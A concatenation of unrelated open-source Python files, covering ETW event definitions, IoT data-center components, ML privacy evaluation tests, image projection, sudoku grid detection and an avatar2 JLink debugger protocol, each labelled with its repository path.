"FunctionName" / WString
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=104, version=1)
class HidEventFilter_104_1(Etw):
pattern = Struct(
"FunctionName" / WString,
"Status" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=105, version=1)
class HidEventFilter_105_1(Etw):
pattern = Struct(
"Device" / Int64ul,
"DeviceInit" / Int64ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=106, version=1)
class HidEventFilter_106_1(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=107, version=1)
class HidEventFilter_107_1(Etw):
pattern = Struct(
"Device" / Int64ul,
"PreviousState" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=108, version=1)
class HidEventFilter_108_1(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=109, version=1)
class HidEventFilter_109_1(Etw):
pattern = Struct(
"WDFDEVICE" / Int64ul,
"TargetState" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=110, version=1)
class HidEventFilter_110_1(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=111, version=1)
class HidEventFilter_111_1(Etw):
pattern = Struct(
"Message" / WString,
"FeatureDataValue" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=115, version=1)
class HidEventFilter_115_1(Etw):
pattern = Struct(
"Message" / WString,
"AcpiNotificationValue" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=117, version=1)
class HidEventFilter_117_1(Etw):
pattern = Struct(
"Message" / WString,
"IndicatorsStatus" / Int32ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=127, version=1)
class HidEventFilter_127_1(Etw):
pattern = Struct(
"Request" / Int64ul,
"Queue" / Int64ul,
"OutputBufferLength" / Int64ul,
"InputBufferLength" / Int64ul,
"IOCTL" / Int64ul
)
@declare(guid=guid("dde50426-fa77-4088-8e0c-f2f553fb6843"), event_id=128, version=1)
class HidEventFilter_128_1(Etw):
pattern = Struct(
"Request" / Int64ul,
"Status" / Int32ul
)
|
test/Actions/addpost-link-fixture/strip.py | moroten/scons | 1,403 | 115586 |
<reponame>moroten/scons
import sys
print("strip.py: %s" % " ".join(sys.argv[1:]))
|
common/trainers/trecqa_trainer.py | karkaroff/castor | 132 | 115593 |
<gh_stars>100-1000
from .qa_trainer import QATrainer
class TRECQATrainer(QATrainer):
pass
|
benchmark/bench_redirect_from_logging.py | YoavCohen/logbook | 771 | 115608 |
"""Tests redirects from logging to logbook"""
from logging import getLogger
from logbook import StreamHandler
from logbook.compat import redirect_logging
from cStringIO import StringIO
redirect_logging()
log = getLogger('Test logger')
def run():
out = StringIO()
with StreamHandler(out):
for x in xrange(500):
log.warning('this is not handled')
assert out.getvalue().count('\n') == 500
|
liota/dccs/dcc.py | giyyanan/liota | 361 | 115621 |
<filename>liota/dccs/dcc.py
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------#
# Copyright © 2015-2016 VMware, Inc. All Rights Reserved. #
# #
# Licensed under the BSD 2-Clause License (the “License”); you may not use #
# this file except in compliance with the License. #
# #
# The BSD 2-Clause License #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are met:#
# #
# - Redistributions of source code must retain the above copyright notice, #
# this list of conditions and the following disclaimer. #
# #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in the #
# documentation and/or other materials provided with the distribution. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"#
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE #
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE #
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE #
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR #
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF #
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN #
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) #
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF #
# THE POSSIBILITY OF SUCH DAMAGE. #
# ----------------------------------------------------------------------------#
import logging
from abc import ABCMeta, abstractmethod
from liota.entities.entity import Entity
from liota.dcc_comms.dcc_comms import DCCComms
from liota.entities.metrics.registered_metric import RegisteredMetric
log = logging.getLogger(__name__)
class DataCenterComponent:
"""
Abstract base class for all DCCs.
"""
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, comms):
"""
Abstract init method for DCC (Data Center Component).
:param comms: DccComms Object
"""
if not isinstance(comms, DCCComms):
log.error("DCCComms object is expected.")
raise TypeError("DCCComms object is expected.")
self.comms = comms
@abstractmethod
def register(self, entity_obj):
"""
Abstract register method to register an Entity Object with the Dcc. Call this method from subclasses for a type
check.
        If successful, a RegisteredEntity should be returned by the DCC implementation; raise an exception on failure.
:param entity_obj: Entity Object to be registered.
:return:
"""
if not isinstance(entity_obj, Entity):
log.error("Entity object is expected.")
raise TypeError("Entity object is expected.")
@abstractmethod
def create_relationship(self, reg_entity_parent, reg_entity_child):
"""
Abstract create_relationship method to create a relationship between a parent and a child entity.
:param reg_entity_parent: RegisteredEntity object of the parent.
:param reg_entity_child: RegisteredEntity object of the child.
:return:
"""
pass
@abstractmethod
def _format_data(self, reg_metric):
"""
Abstract _format_data method. This is a private method and it should take care of formatting the message
in a structure specific to a DCC.
:param reg_metric: RegisteredMetric Object
:return: Formatted message string
"""
pass
def publish(self, reg_metric):
"""
Publishes the formatted message to the Dcc using DccComms.
Users must pass MessagingAttributes Object as part of RegisteredMetric Objects wherever necessary.
This method EXPECTS MessagingAttributes to be passed in RegisteredMetric's 'msg_attr' attribute.
:param reg_metric: RegisteredMetricObject.
:return:
"""
if not isinstance(reg_metric, RegisteredMetric):
log.error("RegisteredMetric object is expected.")
raise TypeError("RegisteredMetric object is expected.")
message = self._format_data(reg_metric)
if message:
if hasattr(reg_metric, 'msg_attr'):
self.comms.send(message, reg_metric.msg_attr)
else:
self.comms.send(message, None)
@abstractmethod
def set_properties(self, reg_entity, properties):
"""
Abstract set_properties method. DCCs should implement this method to allow RegisteredEntities to set their
properties.
:param reg_entity: RegisteredEntity Object
        :param properties: Property String, List or Dict, dependent on the DCC implementation
:return:
"""
pass
@abstractmethod
def unregister(self, entity_obj):
"""
Abstract unregister method. DCCs should implement this method to un-register an Entity.
:param entity_obj: Entity Object
:return:
"""
if not isinstance(entity_obj, Entity):
raise TypeError
class RegistrationFailure(Exception):
"""
Raise this exception in case of registration failure with the DCC.
"""
pass
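# Minimal sketch of a concrete DCC subclass (illustrative only, not part of
# liota's dcc module; the ConsoleDCC name, the RegisteredEntity import path, and
# its constructor arguments are assumptions):
#
#     from liota.entities.registered_entity import RegisteredEntity
#
#     class ConsoleDCC(DataCenterComponent):
#         def __init__(self, comms):
#             super(ConsoleDCC, self).__init__(comms)       # DCCComms type check
#
#         def register(self, entity_obj):
#             super(ConsoleDCC, self).register(entity_obj)  # Entity type check
#             return RegisteredEntity(entity_obj, self, entity_obj.entity_id)
#
#         def create_relationship(self, reg_entity_parent, reg_entity_child):
#             reg_entity_child.parent = reg_entity_parent
#
#         def _format_data(self, reg_metric):
#             return str(reg_metric)   # real DCCs build a DCC-specific payload here
#
#         def set_properties(self, reg_entity, properties):
#             pass
#
#         def unregister(self, entity_obj):
#             super(ConsoleDCC, self).unregister(entity_obj)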
|
tests/ut/python/privacy/evaluation/test_membership_inference.py | hboshnak/mindarmour | 139 | 115640 |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
membership inference test
"""
import pytest
import numpy as np
import mindspore.dataset as ds
from mindspore import nn
from mindspore.train import Model
import mindspore.context as context
from mindarmour.privacy.evaluation import MembershipInference
from tests.ut.python.utils.mock_net import Net
context.set_context(mode=context.GRAPH_MODE)
def dataset_generator():
"""mock training data."""
batch_size = 16
batches = 1
data = np.random.randn(batches*batch_size, 1, 32, 32).astype(
np.float32)
label = np.random.randint(0, 10, batches*batch_size).astype(np.int32)
for i in range(batches):
yield data[i*batch_size:(i + 1)*batch_size],\
label[i*batch_size:(i + 1)*batch_size]
@pytest.mark.level0
@pytest.mark.platform_x86_ascend_training
@pytest.mark.platform_arm_ascend_training
@pytest.mark.env_onecard
@pytest.mark.component_mindarmour
def test_get_membership_inference_object():
net = Net()
loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True)
opt = nn.Momentum(params=net.trainable_params(), learning_rate=0.1, momentum=0.9)
model = Model(network=net, loss_fn=loss, optimizer=opt)
inference_model = MembershipInference(model, -1)
assert isinstance(inference_model, MembershipInference)
@pytest.mark.level0
@pytest.mark.platform_x86_ascend_training
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_gpu_training
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
@pytest.mark.component_mindarmour
def test_membership_inference_object_train():
net = Net()
loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True)
opt = nn.Momentum(params=net.trainable_params(), learning_rate=0.1, momentum=0.9)
model = Model(network=net, loss_fn=loss, optimizer=opt)
inference_model = MembershipInference(model, 2)
assert isinstance(inference_model, MembershipInference)
config = [{
"method": "KNN",
"params": {
"n_neighbors": [3, 5, 7],
}
}]
ds_train = ds.GeneratorDataset(dataset_generator,
["image", "label"])
ds_test = ds.GeneratorDataset(dataset_generator,
["image", "label"])
inference_model.train(ds_train, ds_test, config)
@pytest.mark.level0
@pytest.mark.platform_x86_ascend_training
@pytest.mark.platform_arm_ascend_training
@pytest.mark.env_onecard
@pytest.mark.component_mindarmour
def test_membership_inference_eval():
net = Net()
loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True)
opt = nn.Momentum(params=net.trainable_params(), learning_rate=0.1, momentum=0.9)
model = Model(network=net, loss_fn=loss, optimizer=opt)
inference_model = MembershipInference(model, -1)
assert isinstance(inference_model, MembershipInference)
eval_train = ds.GeneratorDataset(dataset_generator,
["image", "label"])
eval_test = ds.GeneratorDataset(dataset_generator,
["image", "label"])
metrics = ["precision", "accuracy", "recall"]
inference_model.eval(eval_train, eval_test, metrics)
|
e4e_projection.py | Harry45/JoJoGAN | 1,051 | 115670 |
<gh_stars>1000+
import os
import sys
import numpy as np
from PIL import Image
import torch
import torchvision.transforms as transforms
from argparse import Namespace
from e4e.models.psp import pSp
from util import *
@ torch.no_grad()
def projection(img, name, device='cuda'):
model_path = 'models/e4e_ffhq_encode.pt'
ckpt = torch.load(model_path, map_location='cpu')
opts = ckpt['opts']
opts['checkpoint_path'] = model_path
opts= Namespace(**opts)
net = pSp(opts, device).eval().to(device)
transform = transforms.Compose(
[
transforms.Resize(256),
transforms.CenterCrop(256),
transforms.ToTensor(),
transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5]),
]
)
img = transform(img).unsqueeze(0).to(device)
images, w_plus = net(img, randomize_noise=False, return_latents=True)
result_file = {}
result_file['latent'] = w_plus[0]
torch.save(result_file, name)
return w_plus[0]
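# Hedged usage sketch (not part of the original file; the image path and output
# name are placeholders): project a face image into the e4e latent space and
# cache the resulting w+ code.
#
#     from PIL import Image
#     img = Image.open('face.jpg').convert('RGB')
#     latent = projection(img, 'face_latent.pt', device='cuda')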
|
tutorial/stage0/setup.py | cloudmatrix/esky | 190 | 115727 |
<gh_stars>100-1000
import sys
# for windows
# > python setup.py py2exe
if sys.argv[1] == 'py2exe':
import py2exe
from distutils.core import setup
setup(
name = "example-app",
version = "0.0",
console = ["example.py"]
)
# for mac
# > python setup.py py2app
elif sys.argv[1] == 'py2app':
from setuptools import setup
setup(
name = "example-app",
app=["example.py"],
version = "0.0",
setup_requires=["py2app"],
options={'py2app':{}},
)
# cx freeze cross platform
# > python setup.py build
elif sys.argv[1] == 'build':
from cx_Freeze import setup, Executable
setup(
name = 'example-app',
version = '0.0',
executables=[Executable('example.py')],
)
|
Ryven/packages/auto_generated/selectors/nodes.py | tfroehlich82/Ryven | 2,872 | 115742 |
from NENV import *
import selectors
class NodeBase(Node):
pass
class _Can_Use_Node(NodeBase):
"""
Check if we can use the selector depending upon the
operating system. """
title = '_can_use'
type_ = 'selectors'
init_inputs = [
NodeInputBP(label='method'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, selectors._can_use(self.input(0)))
class _Fileobj_To_Fd_Node(NodeBase):
"""
Return a file descriptor from a file object.
Parameters:
fileobj -- file object or file descriptor
Returns:
corresponding file descriptor
Raises:
ValueError if the object is invalid
"""
title = '_fileobj_to_fd'
type_ = 'selectors'
init_inputs = [
NodeInputBP(label='fileobj'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, selectors._fileobj_to_fd(self.input(0)))
class Abstractmethod_Node(NodeBase):
"""
A decorator indicating abstract methods.
Requires that the metaclass is ABCMeta or derived from it. A
class that has a metaclass derived from ABCMeta cannot be
instantiated unless all of its abstract methods are overridden.
The abstract methods can be called using any of the normal
'super' call mechanisms. abstractmethod() may be used to declare
abstract methods for properties and descriptors.
Usage:
class C(metaclass=ABCMeta):
@abstractmethod
def my_abstract_method(self, ...):
...
"""
title = 'abstractmethod'
type_ = 'selectors'
init_inputs = [
NodeInputBP(label='funcobj'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, selectors.abstractmethod(self.input(0)))
class Namedtuple_Node(NodeBase):
"""
Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', ['x', 'y'])
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
>>> p.x + p.y # fields also accessible by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
title = 'namedtuple'
type_ = 'selectors'
init_inputs = [
NodeInputBP(label='typename'),
NodeInputBP(label='field_names'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, selectors.namedtuple(self.input(0), self.input(1)))
export_nodes(
_Can_Use_Node,
_Fileobj_To_Fd_Node,
Abstractmethod_Node,
Namedtuple_Node,
)
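# Illustrative sketch of how a further wrapper node for this package could look,
# following the pattern above (not produced by the NENV generator; the class
# name is hypothetical):
#
#     class DefaultSelector_Node(NodeBase):
#         """Instantiate the platform's default selectors.DefaultSelector."""
#         title = 'DefaultSelector'
#         type_ = 'selectors'
#         init_inputs = []
#         init_outputs = [NodeOutputBP(type_='data')]
#         color = '#32DA22'
#
#         def update_event(self, inp=-1):
#             self.set_output_val(0, selectors.DefaultSelector())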
|
utils/management/commands/rqworker.py | schiederme/peering-manager | 173 | 115777 |
from django.conf import settings
from django_rq.management.commands.rqworker import Command as C
class Command(C):
"""
Subclass django_rq's built-in rqworker to listen on all configured queues if none
are specified (instead of only the 'default' queue).
"""
def handle(self, *args, **options):
if len(args) < 1:
args = settings.RQ_QUEUES
super().handle(*args, **options)
|
examples/outliers/alibi-detect-combiner/pipeline/outliersdetector/Detector.py | jsreid13/seldon-core | 3,049 | 115815 |
<reponame>jsreid13/seldon-core
import logging
import dill
import os
import numpy as np
dirname = os.path.dirname(__file__)
class Detector:
def __init__(self, *args, **kwargs):
with open(os.path.join(dirname, "preprocessor.dill"), "rb") as prep_f:
self.preprocessor = dill.load(prep_f)
with open(os.path.join(dirname, "model.dill"), "rb") as model_f:
self.od = dill.load(model_f)
def predict(self, X, feature_names=[]):
logging.info("Input: " + str(X))
X_prep = self.preprocessor.transform(X)
output = self.od.predict(X_prep)['data']['is_outlier']
logging.info("Output: " + str(output))
return output
|
src/extract_n_solve/grid_detector.py | krishnabagaria/sudoku-solver | 615 | 115825 |
import cv2
from settings import *
from src.solving_objects.MyHoughLines import *
from src.solving_objects.MyHoughPLines import *
def line_intersection(my_line1, my_line2):
line1 = [[my_line1[0], my_line1[1]], [my_line1[2], my_line1[3]]]
line2 = [[my_line2[0], my_line2[1]], [my_line2[2], my_line2[3]]]
xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])
ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])
def det(a, b):
return a[0] * b[1] - a[1] * b[0]
div = det(xdiff, ydiff)
if div == 0:
raise Exception('lines do not intersect')
d = (det(*line1), det(*line2))
x = det(d, xdiff) / div
y = det(d, ydiff) / div
return [int(x), int(y)]
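# Worked example (illustrative): the segments (0, 0)-(2, 2) and (0, 2)-(2, 0)
# cross at (1, 1):
#
#     line_intersection([0, 0, 2, 2], [0, 2, 2, 0])   # -> [1, 1]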
def look_for_intersections_hough(lines):
hor_up = (1000, 1000, 1000, 1000) # x1,y1,x2,y2
hor_down = (0, 0, 0, 0) # x1,y1,x2,y2
ver_left = (1000, 1000, 1000, 1000) # x1,y1,x2,y2
ver_right = (0, 0, 0, 0) # x1,y1,x2,y2
for line in [line for line in lines if not line.isMerged]:
lim = line.get_limits()
if line.theta < np.pi / 4: # Ligne Verticale
if lim[0] + lim[2] < ver_left[0] + ver_left[2]:
ver_left = lim
elif lim[0] + lim[2] > ver_right[0] + ver_right[2]:
ver_right = lim
else:
if lim[1] + lim[3] < hor_up[1] + hor_up[3]:
hor_up = lim
elif lim[1] + lim[3] > hor_down[1] + hor_down[3]:
hor_down = lim
# raw_limits_lines = [hor_up, hor_down, ver_left, ver_right]
grid_limits = list()
grid_limits.append(line_intersection(hor_up, ver_left))
grid_limits.append(line_intersection(hor_up, ver_right))
grid_limits.append(line_intersection(hor_down, ver_right))
grid_limits.append(line_intersection(hor_down, ver_left))
return grid_limits
def find_corners(contour):
top_left = [10000, 10000]
top_right = [0, 10000]
bottom_right = [0, 0]
bottom_left = [10000, 0]
# contour_x = sorted(contour,key = lambda c:c[0][0])
# contour_y = sorted(contour,key = lambda c:c[0][1])
mean_x = np.mean(contour[:, :, 0])
mean_y = np.mean(contour[:, :, 1])
for j in range(len(contour)):
x, y = contour[j][0]
if x > mean_x: # On right
if y > mean_y: # On bottom
bottom_right = [x, y]
else:
top_right = [x, y]
else:
if y > mean_y: # On bottom
bottom_left = [x, y]
else:
top_left = [x, y]
return [top_left, top_right, bottom_right, bottom_left]
def get_hough_transform(img, edges, display=False):
my_lines = []
img_after_merge = img.copy()
lines_raw = cv2.HoughLines(edges, 1, np.pi / 180, thresh_hough)
for line in lines_raw:
my_lines.append(MyHoughLines(line))
if display:
for line in my_lines:
x1, y1, x2, y2 = line.get_limits()
cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)
merge_lines(my_lines)
grid_limits = look_for_intersections_hough(my_lines)
if display:
for line in [line for line in my_lines if not line.isMerged]:
x1, y1, x2, y2 = line.get_limits()
cv2.line(img_after_merge, (x1, y1), (x2, y2), (255, 0, 0), 2)
for point in grid_limits:
x, y = point
cv2.circle(img_after_merge, (x, y), 10, (255, 0, 0), 3)
if not display:
return grid_limits
else:
return grid_limits, img, img_after_merge
class GridDetector:
def __init__(self, display=False):
self.__display = display
def extract_grids(self, frame):
# Get a threshed image which emphasize lines
threshed_img = self.thresh_img(frame)
# Look for grids corners
grids_corners_list = self.look_for_grids_corners(threshed_img)
# Use grids corners to unwrap img !
unwraped_grid_list, transfo_matrix = self.unwrap_grids(frame, grids_corners_list)
return unwraped_grid_list, grids_corners_list, transfo_matrix
@staticmethod
def thresh_img(frame):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray_enhance = (gray - gray.min()) * int(255 / (gray.max() - gray.min()))
blurred = cv2.GaussianBlur(gray_enhance, (5, 5), 0)
thresh = cv2.adaptiveThreshold(blurred, 255,
cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY,
block_size_big, mean_sub_big)
thresh_not = cv2.bitwise_not(thresh)
kernel_close = np.ones((5, 5), np.uint8)
closing = cv2.morphologyEx(thresh_not, cv2.MORPH_CLOSE, kernel_close) # Delete space between line
dilate = cv2.morphologyEx(closing, cv2.MORPH_DILATE, kernel_close) # Delete space between line
return dilate
@staticmethod
def unwrap_grids(frame, points_grids):
undistorted_grids = []
transfo_matrix_list = []
for points_grid in points_grids:
final_pts = np.array(
[[0, 0], [target_w_grid - 1, 0],
[target_w_grid - 1, target_h_grid - 1], [0, target_h_grid - 1]],
dtype=np.float32)
transfo_mat = cv2.getPerspectiveTransform(points_grid, final_pts)
undistorted_grids.append(cv2.warpPerspective(frame, transfo_mat, (target_w_grid, target_h_grid)))
transfo_matrix_list.append(np.linalg.inv(transfo_mat))
return undistorted_grids, transfo_matrix_list
@staticmethod
def look_for_grids_corners(img_lines):
contours, _ = cv2.findContours(img_lines, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
best_contours = []
contours = sorted(contours, key=cv2.contourArea, reverse=True)
biggest_area = cv2.contourArea(contours[0])
for cnt in contours:
area = cv2.contourArea(cnt)
if area < smallest_area_allow:
break
if area > biggest_area / ratio_lim:
peri = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, approx_poly_coef * peri, True)
if len(approx) == 4:
best_contours.append(approx)
corners = []
for best_contour in best_contours:
corners.append(find_corners(best_contour))
return np.array(corners, dtype=np.float32)
if __name__ == '__main__':
# im_path = "dataset_test/021.jpg"
im_path = "images_test/sudoku.jpg"
# im_path = "tmp/030.jpg"
# im_path = "images_test/imagedouble.jpg"
# im_path = "images_test/izi_distord.jpg"
im = cv2.imread(im_path)
cv2.imshow("im", im)
detector = GridDetector()
res_grids_final, _, _ = detector.extract_grids(im)
if res_grids_final is not None:
for (i, im_grid) in enumerate(res_grids_final):
cv2.imshow('grid_final_{}'.format(i), im_grid)
cv2.imwrite('images_test/grid_cut_{}.jpg'.format(i), im_grid)
cv2.waitKey()
|
tests/roots/test-ext-autodoc/target/imported_members.py | samdoran/sphinx | 4,973 | 115833 |
from .partialfunction import func2, func3
|
avatar2/protocols/jlink.py | ispras/avatar2 | 415 | 115861 |
import sys
import pylink
from time import sleep
from threading import Thread, Event, Condition
import logging
import re
if sys.version_info < (3, 0):
import Queue as queue
# __class__ = instance.__class__
else:
import queue
from avatar2.archs.arm import ARM
from avatar2.targets import TargetStates
from avatar2.message import AvatarMessage, UpdateStateMessage, BreakpointHitMessage
class JLinkProtocol(Thread):
"""Main class for the JLink bprotocol, via pylink-square
:ivar serial: The serial number of the JLink to connect to
:ivar device: The JLink device name for the target
:ivar avatar: the avatar object
:ivar origin: the target utilizing this protocol
"""
def __init__(self, serial="12345678", device="ARM7", avatar=None, origin=None):
self._shutdown = Event()
self.avatar = avatar
self.origin = origin
self.jlink = pylink.JLink()
self.jlink.open(serial)
self.log = logging.getLogger('%s.%s' %
(origin.log.name, self.__class__.__name__)
) if origin else \
logging.getLogger(self.__class__.__name__)
Thread.__init__(self)
self.connect(device=device)
def __del__(self):
self.shutdown()
def connect(self, device="ARM7"):
# Todo add a time out here
while True:
try:
self.jlink.connect(device, verbose=True)
self.jlink.ir_len()
break
except pylink.errors.JLinkException:
self.log.info("Connection failed, trying again...")
sleep(0.25)
self.log.info("Connected to JLink target")
self.start()
return True
def reset(self, halt=True):
self.log.info("Resetting target")
return self.jlink.reset(halt=halt)
def shutdown(self):
self._shutdown.set()
def update_target_regs(self):
"""
This function will try to update the TargetRegs based on the list of
        registers known to the JLink.
"""
regs = {}
for idx in self.jlink.register_list():
name = self.jlink.register_name(idx)
regs[name] = idx
if hasattr(self.origin, 'regs'):
self.origin.regs._update(regs)
def run(self):
# Target state management thread
# This thread needs to poll for the halted state
# of the target
        # JLink does not provide asynchronous halt notifications
# Also, not all targets produce a "moe" (Mode of Entry)
# so we have to actually do that here.
try:
while not self._shutdown.is_set():
is_halted = self.jlink.halted()
if is_halted and self.origin.state == TargetStates.RUNNING:
# We just halted
# But did we hit a BP?
self.log.debug("JLink Target is halting...")
avatar_msg = UpdateStateMessage(self.origin, TargetStates.STOPPED)
self.avatar.fast_queue.put(avatar_msg)
self.origin.wait()
self.log.debug("JLink target has halted")
pc = self.get_pc()
if self.jlink.breakpoint_find(pc):
self.log.debug("JLink Target hit breakpoint %d" % self.jlink.breakpoint_find(pc))
avatar_msg = BreakpointHitMessage(self.origin, self.jlink.breakpoint_find(pc), pc)
self.avatar.queue.put(avatar_msg)
elif not is_halted and self.origin.state == TargetStates.STOPPED:
self.log.debug("About to resume target.")
avatar_msg = UpdateStateMessage(self.origin, TargetStates.RUNNING)
self.avatar.fast_queue.put(avatar_msg)
while self.origin.state != TargetStates.RUNNING:
pass
self.log.debug("JLink target has resumed")
        except Exception:
self.log.exception("JLink target errored")
finally:
self.log.info("JLink target exiting")
self.jlink.close()
def set_breakpoint(self, line,
hardware=False,
temporary=False,
regex=False,
condition=None,
ignore_count=0,
thread=0,
pending=False):
"""Inserts a breakpoint
:param bool hardware: Hardware breakpoint
        :param bool temporary: Temporary breakpoint
:param str regex: If set, inserts breakpoints matching the regex
:param str condition: If set, inserts a breakpoint with specified condition
:param int ignore_count: Amount of times the bp should be ignored
        :param int thread: Thread number in which this breakpoint should be added
:returns: The number of the breakpoint
"""
# TODO: Hw/Sw breakpoint control
self.log.info("Setting breakpoint at %#08x" % line)
ret = self.jlink.breakpoint_set(line)
self.log.info("Got BP ID %d" % ret)
return ret
def set_watchpoint(self, variable, write=True, read=False):
return self.jlink.watchpoint_set(variable, write=write, read=read)
def remove_breakpoint(self, bkpt):
"""Deletes a breakpoint"""
# TODO: Check this
return self.jlink.breakpoint_clear(bkpt)
def write_memory(self, address, wordsize, val, num_words=1, raw=False):
"""Writes memory
:param address: Address to write to
:param wordsize: the size of the write (1, 2, 4 or 8)
:param val: the written value
:type val: int if num_words == 1 and raw == False
list if num_words > 1 and raw == False
str or byte if raw == True
        :param num_words: The amount of words to write
:param raw: Specifies whether to write in raw or word mode
:returns: True on success else False
"""
        if raw:
            if not len(val):
                raise ValueError("val had zero length")
            # Accept str or bytes input; iterating bytes already yields ints
            val = [v if isinstance(v, int) else ord(v) for v in val]
        try:
            self.jlink.memory_write(address, val)
            return True
        except pylink.errors.JLinkException:
            return False
def read_memory(self, address, wordsize=4, num_words=1, raw=False):
"""reads memory
:param address: Address to write to
:param wordsize: the size of a read word (1, 2, 4 or 8)
:param num_words: the amount of read words
:param raw: Whether the read memory should be returned unprocessed
:return: The read memory
"""
ret = self.jlink.memory_read(address, num_units=num_words, nbits=wordsize)
        if raw:
            # Pack the read units back into a byte string (little-endian assumed here)
            raw_mem = b"".join(
                i.to_bytes(int(math.ceil(i.bit_length() / 8.0)) or 1, "little")
                for i in ret
            )
            return raw_mem
return ret
def read_register(self, reg):
        the_reg = reg.lower()
        the_idx = -1
        for idx in self.jlink.register_list():
            if the_reg == self.jlink.register_name(idx).lower():
the_idx = idx
break
        return self.jlink.register_read(the_idx)
def get_pc(self):
        # Get PC by scanning the register list for the PC entry
for idx in self.jlink.register_list():
if "PC" in self.jlink.register_name(idx):
return self.jlink.register_read(idx)
def write_register(self, reg, val):
"""Set one register on the target
:returns: True on success"""
        the_reg = reg.lower()
        the_idx = -1
        for idx in self.jlink.register_list():
            if the_reg == self.jlink.register_name(idx).lower():
the_idx = idx
break
return self.jlink.register_write(the_idx, val)
def step(self):
"""Step one instruction on the target
:returns: True on success"""
return self.jlink.step()
def cont(self):
"""Continues the execution of the target
:returns: True on success"""
self.log.info("Resuming target...")
return self.jlink.restart()
def stop(self):
"""Stops execution of the target
:returns: True on success"""
self.log.info("Stopping target...")
return self.jlink.halt()
def set_endianness(self, endianness='little'):
if 'little' in endianness:
self.jlink.set_little_endian()
elif "big" in endianness:
self.jlink.set_big_endian()
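# Minimal usage sketch for this protocol class. Illustrative only and not part
# of avatar2: the serial number, device name and addresses below are made-up
# assumptions, and a real setup would normally drive this through an avatar2
# Target rather than using the protocol object directly.
#
#   proto = JLinkProtocol(serial="50123456", device="CORTEX-M4")
#   proto.set_breakpoint(0x08000400)
#   proto.cont()                      # resume until the breakpoint is hit
#   pc = proto.get_pc()
#   data = proto.read_memory(0x20000000, wordsize=4, num_words=4)
#   proto.shutdown()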
|
f5/multi_device/cluster/test/functional/teardown_exist.py
|
nghia-tran/f5-common-python
| 272 |
115869
|
from f5.bigip import ManagementRoot
